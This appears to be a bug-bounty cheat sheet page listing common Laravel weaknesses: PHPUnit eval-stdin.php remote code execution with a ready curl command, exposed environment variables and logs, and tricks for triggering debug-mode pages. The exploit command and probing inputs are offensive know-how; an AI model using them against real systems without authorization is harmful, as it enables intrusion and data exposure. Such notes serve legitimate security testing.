Projects STRLCPY AllAboutBugBounty Files
🤬
27 lines | ISO-8859-1 | 1005 bytes

Common bug in laravel framework

  1. Laravel PHPUnit Remote Code Execution

Command

curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  1. Exposed environment variables

Environment Variables

  1. Exposed log files
  1. Laravel Debug Mode Enabled
  • Using SQL injection query in GET or POST method
  • Try path /logout (ex:target.com/logout)
  • Using [] in paramater (ex:target.com/param[]=0)

Laravel Debug Mode

Source: Nakanosec

Please wait...
Page is in error, reload to recover